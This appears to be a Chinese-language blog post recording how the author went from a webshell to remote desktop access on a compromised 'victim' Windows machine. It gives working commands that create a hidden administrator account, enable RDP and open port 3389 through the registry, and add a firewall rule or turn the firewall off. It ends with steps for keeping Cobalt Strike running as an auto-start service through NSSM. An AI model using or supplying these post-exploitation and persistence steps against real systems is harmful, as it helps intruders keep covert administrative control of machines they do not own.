webshell转远程桌面

就在刚刚我成功的通过webshell跳到了远程桌面
下面记录一下拿下的过程
参考以下链接即可
添加用户(「渗透技巧」添加 administrator 影子用户-CSDN博客)[https://blog.csdn.net/Javachichi/article/details/129280873]
开启远程桌面端口(单独记录内网渗透时如何使用命令行允许远程访问+开启3389端口,并进行哈希传递进行远程桌面连接 - BattleofZhongDinghe - 博客园 (cnblogs.com))[https://blog.csdn.net/Javachichi/article/details/129280873]

添加用户:
net user username$ Passwd123 /add #添加一个普通用户
（$符添加时 ， 只是在 net user 中无法查看到当前用户 ，而在 net localgroup administrators 中是可以看到的）
net localgroup administrators username$ /add #添加到管理员组
net user && net localgroup administrators #用于查询有什么用户的命令

添加远程桌面端口:
1.受害机执行允许远程访问的命令
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2.受害机开启3389端口
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net stop TermService
net start TermService
防火墙相关设置
以下二选一
1)防火墙开启3389端口(首选)
netsh advfirewall firewall add rule name="Allow Remote Desktop" dir=in action=allow protocol=TCP localport=3389
2)直接关掉防火墙
netsh advfirewall set allprofiles state off
3.查看3389是否开启
netstat -ano | findstr 3389

更多请见开头列出的两篇博客,这里只列出我试验过的命令

使用服务将cobaltstrike持久化:
要将批处理文件（.bat 文件）注册为服务并在 Windows 开机时自启动，你可以结合使用 NSSM（Non-Sucking Service Manager） 工具来实现。以下是详细步骤：

1. 下载和安装 NSSM：
   o 访问 NSSM 官方网站 下载最新版本的 NSSM 工具。
   o 解压缩并将 nssm.exe 放置在一个方便访问的路径（例如 C:\nssm）。
2. 打开命令提示符：
   o 以管理员身份运行命令提示符（或 PowerShell）。
3. 使用 NSSM 创建服务：
   o 在命令提示符中，使用以下命令来创建服务。假设你的批处理文件路径为 C:\path\to\your\script.bat，并为服务取名为 YourServiceName：
   o nssm install YourServiceName "C:\path\to\your\script.bat" 1
4. 配置 NSSM 设置：
   o 使用以下命令编辑服务的设置：
   o nssm edit YourServiceName
   o 在 NSSM 窗口的“Details”选项卡中，将服务的启动类型设置为“自动（Automatic）”，以确保服务在系统启动时自动启动。
5. 验证服务是否自启动：
   o 重新启动计算机，查看服务管理器中的服务是否已经自动启动，并确保你的批处理文件按预期运行。